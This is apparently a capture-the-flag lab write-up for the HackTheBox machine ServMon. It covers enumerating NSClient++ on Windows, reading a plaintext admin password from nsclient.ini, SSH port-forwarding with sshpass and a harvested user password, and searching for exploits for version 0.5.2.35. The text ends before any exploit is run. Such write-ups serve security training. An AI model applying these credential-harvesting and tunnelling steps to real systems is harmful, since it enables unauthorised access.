NSClient++
ps c:\Program Files> ls
directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/1/2022 1:20 AM Common Files
d----- 11/11/2019 6:52 PM internet explorer
d----- 2/28/2022 6:07 PM MSBuild
d----- 2/28/2022 6:55 PM NSClient++
d----- 2/28/2022 6:46 PM NVMS-1000
d----- 2/28/2022 6:32 PM OpenSSH-Win64
d----- 2/28/2022 6:07 PM Reference Assemblies
d----- 2/28/2022 5:44 PM VMware
d-r--- 11/11/2019 6:52 PM Windows Defender
d----- 11/11/2019 6:52 PM Windows Defender Advanced Threat Protection
d----- 9/15/2018 12:19 AM Windows Mail
d----- 11/11/2019 6:52 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 11/11/2019 6:52 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 2/28/2022 6:25 PM WindowsPowerShell
ps c:\Program Files\NSClient++> cd NSClient++ ; ls
directory: C:\Program Files\NSClient++
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/28/2022 6:55 PM crash-dumps
d----- 2/28/2022 6:55 PM modules
d----- 2/28/2022 6:55 PM scripts
d----- 2/28/2022 6:55 PM security
-a---- 12/9/2015 12:17 AM 28672 boost_chrono-vc110-mt-1_58.dll
-a---- 12/9/2015 12:17 AM 50688 boost_date_time-vc110-mt-1_58.dll
-a---- 12/9/2015 12:22 AM 439296 boost_program_options-vc110-mt-1_58.dll
-a---- 12/9/2015 12:23 AM 256000 boost_python-vc110-mt-1_58.dll
-a---- 12/9/2015 12:17 AM 765952 boost_regex-vc110-mt-1_58.dll
-a---- 12/9/2015 12:16 AM 19456 boost_system-vc110-mt-1_58.dll
-a---- 12/9/2015 12:18 AM 102400 boost_thread-vc110-mt-1_58.dll
-a---- 1/14/2020 1:24 PM 51 boot.ini
-a---- 1/18/2018 3:51 PM 157453 changelog.txt
-a---- 1/28/2018 10:33 PM 1210392 check_nrpe.exe
-a---- 11/5/2017 9:09 PM 318464 Google.ProtocolBuffers.dll
-a---- 12/8/2015 11:16 PM 1655808 libeay32.dll
-a---- 11/5/2017 10:04 PM 18351 license.txt
-a---- 10/5/2017 7:19 AM 203264 lua.dll
-a---- 4/10/2020 6:32 PM 2683 nsclient.ini
-a---- 1/30/2023 1:33 AM 41757 nsclient.log
-a---- 11/5/2017 9:42 PM 55808 NSCP.Core.dll
-a---- 1/28/2018 10:32 PM 4765208 nscp.exe
-a---- 11/5/2017 9:42 PM 483328 NSCP.Protobuf.dll
-a---- 11/19/2017 4:18 PM 534016 nscp_json_pb.dll
-a---- 11/19/2017 3:55 PM 2090496 nscp_lua_pb.dll
-a---- 1/23/2018 8:57 PM 507904 nscp_mongoose.dll
-a---- 11/19/2017 3:49 PM 2658304 nscp_protobuf.dll
-a---- 11/5/2017 10:04 PM 3921 old-settings.map
-a---- 1/28/2018 10:21 PM 1973760 plugin_api.dll
-a---- 5/23/2015 8:44 AM 3017216 python27.dll
-a---- 9/27/2015 3:42 PM 28923515 python27.zip
-a---- 1/28/2018 10:34 PM 384536 reporter.exe
-a---- 12/8/2015 11:16 PM 348160 ssleay32.dll
-a---- 5/23/2015 8:44 AM 689664 unicodedata.pyd
-a---- 11/5/2017 9:20 PM 1273856 where_filter.dll
-a---- 5/23/2015 8:44 AM 47616 _socket.pydafter running some servmon, i found the installation directory for nsclient++ at c:\Program Files\NSClient++
There is the nscp.exe executable, which, I assume, has to do with the process found earlier
NSClient++ stores the web administrator password to the nsclient.ini file
NSClient.ini
PS C:\Program Files\NSClient++> cat nsclient.ini
# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
; in flight - TODO
[/settings/NRPE/server]
; Undocumented key
ssl options = no-sslv2,no-sslv3
; Undocumented key
verify mode = peer-cert
; Undocumented key
insecure = false
; in flight - TODO
[/modules]
; Undocumented key
CheckHelpers = disabled
; Undocumented key
CheckEventLog = disabled
; Undocumented key
CheckNSCP = disabled
; Undocumented key
CheckDisk = disabled
; Undocumented key
CheckSystem = disabled
; Undocumented key
WEBServer = enabled
; Undocumented key
NRPEServer = enabled
; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled
; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled
; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled
; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts
placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given argumen
ts.
[/settings/external scripts/wrappings]
; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%
; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%
; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%
SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -
; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]
; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]
; Undocumented key
foobar = command = foobar
; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = truePassword string found.
ew2x6SsGTxjRwXOT
There is also a very suggestive parameter, allowed hosts, that accessing it only be available through localhost
NSClient.log
ps c:\Program Files\NSClient++> cat nsclient.log
[...REDACTED...]
2023-01-30 00:01:40: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:01:47: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:02:32: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:02:32: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:04:24: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:04:29: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:22:14: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 01:33:19: error:c:\source\master\include\socket/server.hpp:255: Socket ERROR: Already open
2023-01-30 01:33:31: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: dead:beef:2::1009
2023-01-30 01:33:41: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: dead:beef:2::1009Checking the logfile confirms the localhost-only rule above as the IP address of Kali was rejected according to it.
This explains why the web server on the port 8443 was not responsive earlier.
I would need to tunnel it in order to further enumerate it.
Webroot
PS C:\Program Files\NSClient++> cd .\web\
PS C:\Program Files\NSClient++\web> ls
Directory: C:\Program Files\NSClient++\web
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/28/2022 6:55 PM static
-a---- 11/5/2017 10:11 PM 5717 index.htmlI can also see the webroot at C:\Program Files\NSClient++\web
Tunneling
ps c:\tmp> copy \\10.10.14.11\smb\chiselx64.exe
copy : Operation did not complete successfully because the file contains a virus or potentially unwanted software.
at line:1 char:1
+ copy \\10.10.14.11\smb\chiselx64.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ categoryinfo : NotSpecified: (:) [Copy-Item], IOException
+ fullyqualifiederrorid : System.IO.IOException,Microsoft.PowerShell.Commands.CopyItemCommand I would normally use Chisel for tunneling, but the local AV blocked it. Since there is SSH enabled in the system, I will take advantage of that
┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ sshpass -p 'l1k3b1gbut7s@w0rk' ssh nadine@$ip -n -f -l 8443:127.0.0.1:8443tunneling the 127.0.0.1:8443 socket of the target system through Kali’s any interface on port 8443
Web
Now I can access the NSClient++ web service as if I was accessing from the target’s localhost
Webroot
Not only those tabs at the top are now responsive, there is a login page greeting me.
I will try to login with the web administrator password found earlier
Successfully logged in.
I was looking for the version information and could not find it.
Then I learned online that there is a dedicated command line tool for NSClient++
It’s called nscp. This was also listed in the installation directory.
PS C:\Program Files\NSClient++> .\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64There I got the version information.
NSClient++ 0.5.2.35
Vulnerability
┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ searchsploit NSClient++ 0.5.2.35
---------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation | windows/local/46802.txt
NSClient++ 0.5.2.35 - Privilege Escalation | windows/local/46802.txt
---------------------------------------------------------- ---------------------------------
shellcodes: No Results
papers: No ResultsSearching for NSClient++ 0.5.2.35 on Exploit-DB reveals that it is suffering from RCE
Moving on the privilege escalation phase